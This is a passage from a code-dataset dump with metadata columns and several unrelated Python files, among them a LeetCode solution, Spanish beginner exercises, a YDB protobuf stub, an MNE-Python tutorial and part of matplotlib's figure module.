blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
616
| content_id
stringlengths 40
40
| detected_licenses
sequencelengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 777
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 149
values | src_encoding
stringclasses 26
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 3
10.2M
| extension
stringclasses 188
values | content
stringlengths 3
10.2M
| authors
sequencelengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
bd63b8e1ecf45c334724bc34debf628114b3047e | f734a39a0c37186e90caea597f13000823c9e67a | /leetcode/Hash Table/1213. Intersection of Three Sorted Arrays.py | 658d6de9e6d97a5ad69bbe7071633e6fde37a8e0 | [
"MIT"
] | permissive | yanshengjia/algorithm | 681746e0371a82860e64a279bfe4c83545469641 | 46caaf74aeab8af74861fb5b249eb4169baf8493 | refs/heads/master | 2022-08-02T20:15:57.927418 | 2022-07-17T14:43:51 | 2022-07-17T14:43:51 | 192,160,418 | 69 | 32 | null | null | null | null | UTF-8 | Python | false | false | 1,006 | py | """
Given three integer arrays arr1, arr2 and arr3 sorted in strictly increasing order, return a sorted array of only the integers that appeared in all three arrays.
Example 1:
Input: arr1 = [1,2,3,4,5], arr2 = [1,2,5,7,9], arr3 = [1,3,4,5,8]
Output: [1,5]
Explanation: Only 1 and 5 appeared in the three arrays.
Solution:
Use Hashtable to record the frequency of numbers, a number in intersection should have the frequency of 3
"""
# Time: O(m+n+q), m n q is the length of 3 arrays
# Space: O(x), x it the size of intersection
class Solution:
def arraysIntersection(self, arr1: List[int], arr2: List[int], arr3: List[int]) -> List[int]:
d = dict()
for c in arr1:
d[c] = d.get(c, 0) + 1
for c in arr2:
d[c] = d.get(c, 0) + 1
for c in arr3:
d[c] = d.get(c, 0) + 1
res = []
for k, v in d.items():
if v == 3:
res.append(k)
res.sort()
return res
| [
"[email protected]"
] | |
7c2d99114b3aafbeb624eb534da25400a8ae4e87 | 06c1d6bcd099bf1c25abb52ba07351b068d1ab16 | /Unidad_3/leccion_3.py | 7c26b82dce0e0e918ab604fafd4e3dc5a427c8aa | [] | no_license | dafnemus/python-curso-udemy | 1105e5f51980d6f5ec32dac338ebc340250c6384 | 493717fb321b24bd5abcadb8e27d25d68b4f12f8 | refs/heads/main | 2023-03-09T12:27:41.934087 | 2021-02-24T18:34:56 | 2021-02-24T18:34:56 | 337,728,568 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,638 | py | # pylint: disable=missing-docstring
# 1. Aplica un incremento de sueldo del 8% al salario de un trabajador.
# Para ello, recuerda que primero debes solicitar el monto base del salario.
def incrementar_sueldo(sueldo):
incremento = 0.08
valor_incrementado = sueldo * incremento
sueldo_incrementado = sueldo + valor_incrementado
print(f'Total sueldo:{sueldo_incrementado}', end=' ')
print(f'incremento: {valor_incrementado}')
incrementar_sueldo(2000)
print()
# 2. Aplica un incremento de sueldo del 8% al salario de un trabajador,
# solo si este gana menos que el salario mínimo
# (escoge cualquier valor para el salario mínimo, porejemplo 1000).
# Si el trabajador gana más que el salario mínimo, el incremento es del 5%
def incrementar_sueldo_2(sueldo):
sueldo_minimo = 1000
incremento_1 = 0.08
incremento_2 = 0.05
sueldo_incrementado = 0
valor_incrementado = 0
if sueldo <= sueldo_minimo:
valor_incrementado = sueldo * incremento_1
elif sueldo > sueldo_minimo:
valor_incrementado = sueldo * incremento_2
sueldo_incrementado = sueldo + valor_incrementado
print(f'Total sueldo:{sueldo_incrementado}', end=' ')
print(f'incremento: {valor_incrementado}')
incrementar_sueldo_2(800)
incrementar_sueldo_2(2000)
print()
# 3. Dado un valor que representa una cantidad en segundos,
# indica su equivalente en minutos, horas y días.
def convertir_segundos(segundos):
un_minuto = 60
hora = 3600
dias = 86400
resultado_min = segundos / un_minuto
resultado_hr = segundos / hora
resultado_dia = segundos / dias
print(f'segundos {segundos}')
print(f'segundos a hora: {resultado_hr}')
print(f'segundos a minutos: {resultado_min}')
print(f'segundosa dias: {resultado_dia}')
convertir_segundos(87600)
print()
# 4. Determinar el mínimo de 3 valores solicitados. Ahora, con 4 valores.
lista_valores = []
def agregar_valor(valor):
lista_valores.append(valor)
def minimo():
print(f'valores: {lista_valores}')
if len(lista_valores) <= 4:
print(f'valor minimo: {min(lista_valores)}')
agregar_valor(2)
agregar_valor(8)
agregar_valor(3)
minimo()
print()
# 5. Solicita al usuario, un número mayor que cero y menor a un millón,
# determina si el número de dígitos de dicho valor.
# Así, si el valor ingresado es 3, entonces el resultado será 1.
# Del mismo modo, si el valor ingresado es 768590, el resultado será 6
def contar_digitos(numero):
if 0 < numero < 1000000:
digitos = len(str(numero))
print(f'el numero {numero} tiene {digitos} digitos')
contar_digitos(22)
| [
"[email protected]"
] | |
19c1083ddebaae8a8cafbbfcbc4f663167f858b0 | 79fa6f3a9c0c07b2768b5c67d48cd2d3ada921c7 | /kikimr/public/api/grpc/ydb_export_v1_pb2.py | 8b1ed589a3769c3321e6a8c3913604b83594a9b6 | [
"Apache-2.0"
] | permissive | clumpytuna/ydb-python-sdk | 8dd951a532045587fcba1d541b3fb8798c358318 | f09d8db19f62032738ed77dabb3672c3e0f86cc3 | refs/heads/master | 2023-06-09T22:38:29.747969 | 2021-06-30T08:09:14 | 2021-06-30T08:09:14 | 319,103,389 | 0 | 0 | NOASSERTION | 2020-12-06T18:32:35 | 2020-12-06T18:32:34 | null | UTF-8 | Python | false | true | 2,581 | py | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: kikimr/public/api/grpc/ydb_export_v1.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from kikimr.public.api.protos import ydb_export_pb2 as kikimr_dot_public_dot_api_dot_protos_dot_ydb__export__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='kikimr/public/api/grpc/ydb_export_v1.proto',
package='Ydb.Export.V1',
syntax='proto3',
serialized_pb=_b('\n*kikimr/public/api/grpc/ydb_export_v1.proto\x12\rYdb.Export.V1\x1a)kikimr/public/api/protos/ydb_export.proto2\xa9\x01\n\rExportService\x12K\n\nExportToYt\x12\x1d.Ydb.Export.ExportToYtRequest\x1a\x1e.Ydb.Export.ExportToYtResponse\x12K\n\nExportToS3\x12\x1d.Ydb.Export.ExportToS3Request\x1a\x1e.Ydb.Export.ExportToS3ResponseB\x1a\n\x18\x63om.yandex.ydb.export.v1b\x06proto3')
,
dependencies=[kikimr_dot_public_dot_api_dot_protos_dot_ydb__export__pb2.DESCRIPTOR,])
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
DESCRIPTOR.has_options = True
DESCRIPTOR._options = _descriptor._ParseOptions(descriptor_pb2.FileOptions(), _b('\n\030com.yandex.ydb.export.v1'))
_EXPORTSERVICE = _descriptor.ServiceDescriptor(
name='ExportService',
full_name='Ydb.Export.V1.ExportService',
file=DESCRIPTOR,
index=0,
options=None,
serialized_start=105,
serialized_end=274,
methods=[
_descriptor.MethodDescriptor(
name='ExportToYt',
full_name='Ydb.Export.V1.ExportService.ExportToYt',
index=0,
containing_service=None,
input_type=kikimr_dot_public_dot_api_dot_protos_dot_ydb__export__pb2._EXPORTTOYTREQUEST,
output_type=kikimr_dot_public_dot_api_dot_protos_dot_ydb__export__pb2._EXPORTTOYTRESPONSE,
options=None,
),
_descriptor.MethodDescriptor(
name='ExportToS3',
full_name='Ydb.Export.V1.ExportService.ExportToS3',
index=1,
containing_service=None,
input_type=kikimr_dot_public_dot_api_dot_protos_dot_ydb__export__pb2._EXPORTTOS3REQUEST,
output_type=kikimr_dot_public_dot_api_dot_protos_dot_ydb__export__pb2._EXPORTTOS3RESPONSE,
options=None,
),
])
_sym_db.RegisterServiceDescriptor(_EXPORTSERVICE)
DESCRIPTOR.services_by_name['ExportService'] = _EXPORTSERVICE
# @@protoc_insertion_point(module_scope)
| [
"[email protected]"
] | |
f18aa97b5ffc96f15248cad15ddee3ba1135c971 | 4a36b5979b0753b32cff3956fd97fb8ed8b11e84 | /0.22/_downloads/aaf6e18611e50c34953a2674b6489a9c/plot_30_info.py | 6f27946faf6e543cadc3b69272928b6c607cd2ee | [] | permissive | mne-tools/mne-tools.github.io | 8aac7ae10bf2faeeb875b9a351a5530dc0e53154 | 495e878adc1ef3374e3db88604504d7542b01194 | refs/heads/main | 2023-09-03T07:06:00.660557 | 2023-09-03T04:10:18 | 2023-09-03T04:10:18 | 35,639,371 | 12 | 16 | BSD-3-Clause | 2023-05-05T19:04:32 | 2015-05-14T22:04:23 | HTML | UTF-8 | Python | false | false | 8,689 | py | # -*- coding: utf-8 -*-
"""
.. _tut-info-class:
The Info data structure
=======================
This tutorial describes the :class:`mne.Info` data structure, which keeps track
of various recording details, and is attached to :class:`~mne.io.Raw`,
:class:`~mne.Epochs`, and :class:`~mne.Evoked` objects.
.. contents:: Page contents
:local:
:depth: 2
We'll begin by loading the Python modules we need, and loading the same
:ref:`example data <sample-dataset>` we used in the :ref:`introductory tutorial
<tut-overview>`:
"""
import os
import mne
sample_data_folder = mne.datasets.sample.data_path()
sample_data_raw_file = os.path.join(sample_data_folder, 'MEG', 'sample',
'sample_audvis_filt-0-40_raw.fif')
raw = mne.io.read_raw_fif(sample_data_raw_file)
###############################################################################
# As seen in the :ref:`introductory tutorial <tut-overview>`, when a
# :class:`~mne.io.Raw` object is loaded, an :class:`~mne.Info` object is
# created automatically, and stored in the ``raw.info`` attribute:
print(raw.info)
###############################################################################
# However, it is not strictly necessary to load the :class:`~mne.io.Raw` object
# in order to view or edit the :class:`~mne.Info` object; you can extract all
# the relevant information into a stand-alone :class:`~mne.Info` object using
# :func:`mne.io.read_info`:
info = mne.io.read_info(sample_data_raw_file)
print(info)
###############################################################################
# As you can see, the :class:`~mne.Info` object keeps track of a lot of
# information about:
#
# - the recording system (gantry angle, HPI details, sensor digitizations,
# channel names, ...)
# - the experiment (project name and ID, subject information, recording date,
# experimenter name or ID, ...)
# - the data (sampling frequency, applied filter frequencies, bad channels,
# projectors, ...)
#
# The complete list of fields is given in :class:`the API documentation
# <mne.Info>`.
#
#
# Querying the ``Info`` object
# ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
#
# The fields in a :class:`~mne.Info` object act like Python :class:`dictionary
# <dict>` keys, using square brackets and strings to access the contents of a
# field:
print(info.keys())
print() # insert a blank line
print(info['ch_names'])
###############################################################################
# Most of the fields contain :class:`int`, :class:`float`, or :class:`list`
# data, but the ``chs`` field bears special mention: it contains a list of
# dictionaries (one :class:`dict` per channel) containing everything there is
# to know about a channel other than the data it recorded. Normally it is not
# necessary to dig into the details of the ``chs`` field — various MNE-Python
# functions can extract the information more cleanly than iterating over the
# list of dicts yourself — but it can be helpful to know what is in there. Here
# we show the keys for the first channel's :class:`dict`:
print(info['chs'][0].keys())
###############################################################################
# .. _picking_channels:
#
# Obtaining subsets of channels
# ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
#
# It is often useful to convert between channel names and the integer indices
# identifying rows of the data array where those channels' measurements are
# stored. The :class:`~mne.Info` object is useful for this task; two
# convenience functions that rely on the :class:`mne.Info` object for picking
# channels are :func:`mne.pick_channels` and :func:`mne.pick_types`.
# :func:`~mne.pick_channels` minimally takes a list of all channel names and a
# list of channel names to include; it is also possible to provide an empty
# list to ``include`` and specify which channels to ``exclude`` instead:
print(mne.pick_channels(info['ch_names'], include=['MEG 0312', 'EEG 005']))
print(mne.pick_channels(info['ch_names'], include=[],
exclude=['MEG 0312', 'EEG 005']))
###############################################################################
# :func:`~mne.pick_types` works differently, since channel type cannot always
# be reliably determined from channel name alone. Consequently,
# :func:`~mne.pick_types` needs an :class:`~mne.Info` object instead of just a
# list of channel names, and has boolean keyword arguments for each channel
# type. Default behavior is to pick only MEG channels (and MEG reference
# channels if present) and exclude any channels already marked as "bad" in the
# ``bads`` field of the :class:`~mne.Info` object. Therefore, to get *all* and
# *only* the EEG channel indices (including the "bad" EEG channels) we must
# pass ``meg=False`` and ``exclude=[]``:
print(mne.pick_types(info, meg=False, eeg=True, exclude=[]))
###############################################################################
# Note that the ``meg`` and ``fnirs`` parameters of :func:`~mne.pick_types`
# accept strings as well as boolean values, to allow selecting only
# magnetometer or gradiometer channels (via ``meg='mag'`` or ``meg='grad'``) or
# to pick only oxyhemoglobin or deoxyhemoglobin channels (via ``fnirs='hbo'``
# or ``fnirs='hbr'``, respectively).
#
# A third way to pick channels from an :class:`~mne.Info` object is to apply
# `regular expression`_ matching to the channel names using
# :func:`mne.pick_channels_regexp`. Here the ``^`` represents the beginning of
# the string and ``.`` character matches any single character, so both EEG and
# EOG channels will be selected:
print(mne.pick_channels_regexp(info['ch_names'], '^E.G'))
###############################################################################
# :func:`~mne.pick_channels_regexp` can be especially useful for channels named
# according to the `10-20 <ten-twenty_>`_ system (e.g., to select all channels
# ending in "z" to get the midline, or all channels beginning with "O" to get
# the occipital channels). Note that :func:`~mne.pick_channels_regexp` uses the
# Python standard module :mod:`re` to perform regular expression matching; see
# the documentation of the :mod:`re` module for implementation details.
#
# .. warning::
# Both :func:`~mne.pick_channels` and :func:`~mne.pick_channels_regexp`
# operate on lists of channel names, so they are unaware of which channels
# (if any) have been marked as "bad" in ``info['bads']``. Use caution to
# avoid accidentally selecting bad channels.
#
#
# Obtaining channel type information
# ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
#
# Sometimes it can be useful to know channel type based on its index in the
# data array. For this case, use :func:`mne.channel_type`, which takes
# an :class:`~mne.Info` object and a single integer channel index:
print(mne.channel_type(info, 25))
###############################################################################
# To obtain several channel types at once, you could embed
# :func:`~mne.channel_type` in a :term:`list comprehension`, or use the
# :meth:`~mne.io.Raw.get_channel_types` method of a :class:`~mne.io.Raw`,
# :class:`~mne.Epochs`, or :class:`~mne.Evoked` instance:
picks = (25, 76, 77, 319)
print([mne.channel_type(info, x) for x in picks])
print(raw.get_channel_types(picks=picks))
###############################################################################
# Alternatively, you can get the indices of all channels of *all* channel types
# present in the data, using :func:`~mne.channel_indices_by_type`,
# which returns a :class:`dict` with channel types as keys, and lists of
# channel indices as values:
ch_idx_by_type = mne.channel_indices_by_type(info)
print(ch_idx_by_type.keys())
print(ch_idx_by_type['eog'])
###############################################################################
# Dropping channels from an ``Info`` object
# ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
#
# If you want to modify an :class:`~mne.Info` object by eliminating some of the
# channels in it, you can use the :func:`mne.pick_info` function to pick the
# channels you want to keep and omit the rest:
print(info['nchan'])
eeg_indices = mne.pick_types(info, meg=False, eeg=True)
print(mne.pick_info(info, eeg_indices)['nchan'])
###############################################################################
# By default, :func:`~mne.pick_info` will make a copy of the original
# :class:`~mne.Info` object before modifying it; if you want to modify it
# in-place, include the parameter ``copy=False``.
#
#
# .. LINKS
#
# .. _`regular expression`: https://en.wikipedia.org/wiki/Regular_expression
# .. _`ten-twenty`: https://en.wikipedia.org/wiki/10%E2%80%9320_system_(EEG)
| [
"[email protected]"
] | |
1692e595b877b44d05dbf5b3b8052e97d5d06780 | 1d928c3f90d4a0a9a3919a804597aa0a4aab19a3 | /python/matplotlib/2019/8/figure.py | 4e0cc02f9b055f7b8ac7ab105f45c733614451a0 | [] | no_license | rosoareslv/SED99 | d8b2ff5811e7f0ffc59be066a5a0349a92cbb845 | a062c118f12b93172e31e8ca115ce3f871b64461 | refs/heads/main | 2023-02-22T21:59:02.703005 | 2021-01-28T19:40:51 | 2021-01-28T19:40:51 | 306,497,459 | 1 | 1 | null | 2020-11-24T20:56:18 | 2020-10-23T01:18:07 | null | UTF-8 | Python | false | false | 101,029 | py | """
The figure module provides the top-level
:class:`~matplotlib.artist.Artist`, the :class:`Figure`, which
contains all the plot elements. The following classes are defined
:class:`SubplotParams`
control the default spacing of the subplots
:class:`Figure`
Top level container for all plot elements.
"""
import logging
from numbers import Integral
import numpy as np
from matplotlib import rcParams
from matplotlib import backends, docstring, projections
from matplotlib import __version__ as _mpl_version
from matplotlib import get_backend
import matplotlib.artist as martist
from matplotlib.artist import Artist, allow_rasterization
from matplotlib.backend_bases import FigureCanvasBase
import matplotlib.cbook as cbook
import matplotlib.colorbar as cbar
import matplotlib.image as mimage
from matplotlib.axes import Axes, SubplotBase, subplot_class_factory
from matplotlib.blocking_input import BlockingMouseInput, BlockingKeyMouseInput
from matplotlib.gridspec import GridSpec
import matplotlib.legend as mlegend
from matplotlib.patches import Rectangle
from matplotlib.projections import (get_projection_names,
process_projection_requirements)
from matplotlib.text import Text, TextWithDash
from matplotlib.transforms import (Affine2D, Bbox, BboxTransformTo,
TransformedBbox)
import matplotlib._layoutbox as layoutbox
from matplotlib.backend_bases import NonGuiException
_log = logging.getLogger(__name__)
docstring.interpd.update(projection_names=get_projection_names())
def _stale_figure_callback(self, val):
if self.figure:
self.figure.stale = val
class _AxesStack(cbook.Stack):
"""
Specialization of the `.Stack` to handle all tracking of
`~matplotlib.axes.Axes` in a `.Figure`.
This stack stores ``key, (ind, axes)`` pairs, where:
* **key** should be a hash of the args and kwargs
used in generating the Axes.
* **ind** is a serial number for tracking the order
in which axes were added.
The AxesStack is a callable, where ``ax_stack()`` returns
the current axes. Alternatively the :meth:`current_key_axes` will
return the current key and associated axes.
"""
def __init__(self):
super().__init__()
self._ind = 0
def as_list(self):
"""
Return a list of the Axes instances that have been added to the figure.
"""
ia_list = [a for k, a in self._elements]
ia_list.sort()
return [a for i, a in ia_list]
def get(self, key):
"""
Return the Axes instance that was added with *key*.
If it is not present, return *None*.
"""
item = dict(self._elements).get(key)
if item is None:
return None
cbook.warn_deprecated(
"2.1",
message="Adding an axes using the same arguments as a previous "
"axes currently reuses the earlier instance. In a future "
"version, a new instance will always be created and returned. "
"Meanwhile, this warning can be suppressed, and the future "
"behavior ensured, by passing a unique label to each axes "
"instance.")
return item[1]
def _entry_from_axes(self, e):
ind, k = {a: (ind, k) for k, (ind, a) in self._elements}[e]
return (k, (ind, e))
def remove(self, a):
"""Remove the axes from the stack."""
super().remove(self._entry_from_axes(a))
def bubble(self, a):
"""
Move the given axes, which must already exist in the
stack, to the top.
"""
return super().bubble(self._entry_from_axes(a))
def add(self, key, a):
"""
Add Axes *a*, with key *key*, to the stack, and return the stack.
If *key* is unhashable, replace it by a unique, arbitrary object.
If *a* is already on the stack, don't add it again, but
return *None*.
"""
# All the error checking may be unnecessary; but this method
# is called so seldom that the overhead is negligible.
cbook._check_isinstance(Axes, a=a)
try:
hash(key)
except TypeError:
key = object()
a_existing = self.get(key)
if a_existing is not None:
super().remove((key, a_existing))
cbook._warn_external(
"key {!r} already existed; Axes is being replaced".format(key))
# I don't think the above should ever happen.
if a in self:
return None
self._ind += 1
return super().push((key, (self._ind, a)))
def current_key_axes(self):
"""
Return a tuple of ``(key, axes)`` for the active axes.
If no axes exists on the stack, then returns ``(None, None)``.
"""
if not len(self._elements):
return self._default, self._default
else:
key, (index, axes) = self._elements[self._pos]
return key, axes
def __call__(self):
return self.current_key_axes()[1]
def __contains__(self, a):
return a in self.as_list()
@cbook.deprecated("3.2")
class AxesStack(_AxesStack):
pass
class SubplotParams:
"""
A class to hold the parameters for a subplot.
"""
def __init__(self, left=None, bottom=None, right=None, top=None,
wspace=None, hspace=None):
"""
All dimensions are fractions of the figure width or height.
Defaults are given by :rc:`figure.subplot.[name]`.
Parameters
----------
left : float
The left side of the subplots of the figure.
right : float
The right side of the subplots of the figure.
bottom : float
The bottom of the subplots of the figure.
top : float
The top of the subplots of the figure.
wspace : float
The amount of width reserved for space between subplots,
expressed as a fraction of the average axis width.
hspace : float
The amount of height reserved for space between subplots,
expressed as a fraction of the average axis height.
"""
self.validate = True
self.update(left, bottom, right, top, wspace, hspace)
def update(self, left=None, bottom=None, right=None, top=None,
wspace=None, hspace=None):
"""
Update the dimensions of the passed parameters. *None* means unchanged.
"""
thisleft = getattr(self, 'left', None)
thisright = getattr(self, 'right', None)
thistop = getattr(self, 'top', None)
thisbottom = getattr(self, 'bottom', None)
thiswspace = getattr(self, 'wspace', None)
thishspace = getattr(self, 'hspace', None)
self._update_this('left', left)
self._update_this('right', right)
self._update_this('bottom', bottom)
self._update_this('top', top)
self._update_this('wspace', wspace)
self._update_this('hspace', hspace)
def reset():
self.left = thisleft
self.right = thisright
self.top = thistop
self.bottom = thisbottom
self.wspace = thiswspace
self.hspace = thishspace
if self.validate:
if self.left >= self.right:
reset()
raise ValueError('left cannot be >= right')
if self.bottom >= self.top:
reset()
raise ValueError('bottom cannot be >= top')
def _update_this(self, s, val):
if val is None:
val = getattr(self, s, None)
if val is None:
key = 'figure.subplot.' + s
val = rcParams[key]
setattr(self, s, val)
class Figure(Artist):
"""
The top level container for all the plot elements.
The Figure instance supports callbacks through a *callbacks* attribute
which is a `.CallbackRegistry` instance. The events you can connect to
are 'dpi_changed', and the callback will be called with ``func(fig)`` where
fig is the `Figure` instance.
Attributes
----------
patch
The `.Rectangle` instance representing the figure background patch.
suppressComposite
For multiple figure images, the figure will make composite images
depending on the renderer option_image_nocomposite function. If
*suppressComposite* is a boolean, this will override the renderer.
"""
def __str__(self):
return "Figure(%gx%g)" % tuple(self.bbox.size)
def __repr__(self):
return "<{clsname} size {h:g}x{w:g} with {naxes} Axes>".format(
clsname=self.__class__.__name__,
h=self.bbox.size[0], w=self.bbox.size[1],
naxes=len(self.axes),
)
def __init__(self,
figsize=None,
dpi=None,
facecolor=None,
edgecolor=None,
linewidth=0.0,
frameon=None,
subplotpars=None, # default to rc
tight_layout=None, # default to rc figure.autolayout
constrained_layout=None, # default to rc
#figure.constrained_layout.use
):
"""
Parameters
----------
figsize : 2-tuple of floats, default: :rc:`figure.figsize`
Figure dimension ``(width, height)`` in inches.
dpi : float, default: :rc:`figure.dpi`
Dots per inch.
facecolor : default: :rc:`figure.facecolor`
The figure patch facecolor.
edgecolor : default: :rc:`figure.edgecolor`
The figure patch edge color.
linewidth : float
The linewidth of the frame (i.e. the edge linewidth of the figure
patch).
frameon : bool, default: :rc:`figure.frameon`
If ``False``, suppress drawing the figure background patch.
subplotpars : :class:`SubplotParams`
Subplot parameters. If not given, the default subplot
parameters :rc:`figure.subplot.*` are used.
tight_layout : bool or dict, default: :rc:`figure.autolayout`
If ``False`` use *subplotpars*. If ``True`` adjust subplot
parameters using `.tight_layout` with default padding.
When providing a dict containing the keys ``pad``, ``w_pad``,
``h_pad``, and ``rect``, the default `.tight_layout` paddings
will be overridden.
constrained_layout : bool
If ``True`` use constrained layout to adjust positioning of plot
elements. Like ``tight_layout``, but designed to be more
flexible. See
:doc:`/tutorials/intermediate/constrainedlayout_guide`
for examples. (Note: does not work with :meth:`.subplot` or
:meth:`.subplot2grid`.)
Defaults to :rc:`figure.constrained_layout.use`.
"""
super().__init__()
# remove the non-figure artist _axes property
# as it makes no sense for a figure to be _in_ an axes
# this is used by the property methods in the artist base class
# which are over-ridden in this class
del self._axes
self.callbacks = cbook.CallbackRegistry()
if figsize is None:
figsize = rcParams['figure.figsize']
if dpi is None:
dpi = rcParams['figure.dpi']
if facecolor is None:
facecolor = rcParams['figure.facecolor']
if edgecolor is None:
edgecolor = rcParams['figure.edgecolor']
if frameon is None:
frameon = rcParams['figure.frameon']
if not np.isfinite(figsize).all() or (np.array(figsize) <= 0).any():
raise ValueError('figure size must be positive finite not '
f'{figsize}')
self.bbox_inches = Bbox.from_bounds(0, 0, *figsize)
self.dpi_scale_trans = Affine2D().scale(dpi)
# do not use property as it will trigger
self._dpi = dpi
self.bbox = TransformedBbox(self.bbox_inches, self.dpi_scale_trans)
self.transFigure = BboxTransformTo(self.bbox)
self.patch = Rectangle(
xy=(0, 0), width=1, height=1, visible=frameon,
facecolor=facecolor, edgecolor=edgecolor, linewidth=linewidth,
# Don't let the figure patch influence bbox calculation.
in_layout=False)
self._set_artist_props(self.patch)
self.patch.set_antialiased(False)
FigureCanvasBase(self) # Set self.canvas.
self._suptitle = None
if subplotpars is None:
subplotpars = SubplotParams()
self.subplotpars = subplotpars
# constrained_layout:
self._layoutbox = None
# set in set_constrained_layout_pads()
self.set_constrained_layout(constrained_layout)
self.set_tight_layout(tight_layout)
self._axstack = _AxesStack() # track all figure axes and current axes
self.clf()
self._cachedRenderer = None
# groupers to keep track of x and y labels we want to align.
# see self.align_xlabels and self.align_ylabels and
# axis._get_tick_boxes_siblings
self._align_xlabel_grp = cbook.Grouper()
self._align_ylabel_grp = cbook.Grouper()
# list of child gridspecs for this figure
self._gridspecs = []
# TODO: I'd like to dynamically add the _repr_html_ method
# to the figure in the right context, but then IPython doesn't
# use it, for some reason.
def _repr_html_(self):
# We can't use "isinstance" here, because then we'd end up importing
# webagg unconditionally.
if 'WebAgg' in type(self.canvas).__name__:
from matplotlib.backends import backend_webagg
return backend_webagg.ipython_inline_display(self)
def show(self, warn=True):
"""
If using a GUI backend with pyplot, display the figure window.
If the figure was not created using
:func:`~matplotlib.pyplot.figure`, it will lack a
:class:`~matplotlib.backend_bases.FigureManagerBase`, and
will raise an AttributeError.
.. warning::
This does not manage an GUI event loop. Consequently, the figure
may only be shown briefly or not shown at all if you or your
environment are not managing an event loop.
Proper use cases for `.Figure.show` include running this from a
GUI application or an IPython shell.
If you're running a pure python shell or executing a non-GUI
python script, you should use `matplotlib.pyplot.show` instead,
which takes care of managing the event loop for you.
Parameters
----------
warn : bool
If ``True`` and we are not running headless (i.e. on Linux with an
unset DISPLAY), issue warning when called on a non-GUI backend.
"""
try:
manager = getattr(self.canvas, 'manager')
except AttributeError as err:
raise AttributeError("%s\n"
"Figure.show works only "
"for figures managed by pyplot, normally "
"created by pyplot.figure()." % err)
if manager is not None:
try:
manager.show()
return
except NonGuiException:
pass
if (backends._get_running_interactive_framework() != "headless"
and warn):
cbook._warn_external('Matplotlib is currently using %s, which is '
'a non-GUI backend, so cannot show the '
'figure.' % get_backend())
def _get_axes(self):
return self._axstack.as_list()
axes = property(fget=_get_axes,
doc="List of axes in the Figure. You can access the "
"axes in the Figure through this list. "
"Do not modify the list itself. Instead, use "
"`~Figure.add_axes`, `~.Figure.subplot` or "
"`~.Figure.delaxes` to add or remove an axes.")
def _get_dpi(self):
return self._dpi
def _set_dpi(self, dpi, forward=True):
"""
Parameters
----------
dpi : float
forward : bool
Passed on to `~.Figure.set_size_inches`
"""
self._dpi = dpi
self.dpi_scale_trans.clear().scale(dpi)
w, h = self.get_size_inches()
self.set_size_inches(w, h, forward=forward)
self.callbacks.process('dpi_changed', self)
dpi = property(_get_dpi, _set_dpi, doc="The resolution in dots per inch.")
def get_tight_layout(self):
"""Return whether `.tight_layout` is called when drawing."""
return self._tight
def set_tight_layout(self, tight):
"""
Set whether and how `.tight_layout` is called when drawing.
Parameters
----------
tight : bool or dict with keys "pad", "w_pad", "h_pad", "rect" or None
If a bool, sets whether to call `.tight_layout` upon drawing.
If ``None``, use the ``figure.autolayout`` rcparam instead.
If a dict, pass it as kwargs to `.tight_layout`, overriding the
default paddings.
"""
if tight is None:
tight = rcParams['figure.autolayout']
self._tight = bool(tight)
self._tight_parameters = tight if isinstance(tight, dict) else {}
self.stale = True
def get_constrained_layout(self):
"""
Return a boolean: True means constrained layout is being used.
See :doc:`/tutorials/intermediate/constrainedlayout_guide`.
"""
return self._constrained
def set_constrained_layout(self, constrained):
"""
Set whether ``constrained_layout`` is used upon drawing. If None,
the rcParams['figure.constrained_layout.use'] value will be used.
When providing a dict containing the keys `w_pad`, `h_pad`
the default ``constrained_layout`` paddings will be
overridden. These pads are in inches and default to 3.0/72.0.
``w_pad`` is the width padding and ``h_pad`` is the height padding.
See :doc:`/tutorials/intermediate/constrainedlayout_guide`.
Parameters
----------
constrained : bool or dict or None
"""
self._constrained_layout_pads = dict()
self._constrained_layout_pads['w_pad'] = None
self._constrained_layout_pads['h_pad'] = None
self._constrained_layout_pads['wspace'] = None
self._constrained_layout_pads['hspace'] = None
if constrained is None:
constrained = rcParams['figure.constrained_layout.use']
self._constrained = bool(constrained)
if isinstance(constrained, dict):
self.set_constrained_layout_pads(**constrained)
else:
self.set_constrained_layout_pads()
self.stale = True
def set_constrained_layout_pads(self, **kwargs):
"""
Set padding for ``constrained_layout``. Note the kwargs can be passed
as a dictionary ``fig.set_constrained_layout(**paddict)``.
See :doc:`/tutorials/intermediate/constrainedlayout_guide`.
Parameters
----------
w_pad : scalar
Width padding in inches. This is the pad around axes
and is meant to make sure there is enough room for fonts to
look good. Defaults to 3 pts = 0.04167 inches
h_pad : scalar
Height padding in inches. Defaults to 3 pts.
wspace : scalar
Width padding between subplots, expressed as a fraction of the
subplot width. The total padding ends up being w_pad + wspace.
hspace : scalar
Height padding between subplots, expressed as a fraction of the
subplot width. The total padding ends up being h_pad + hspace.
"""
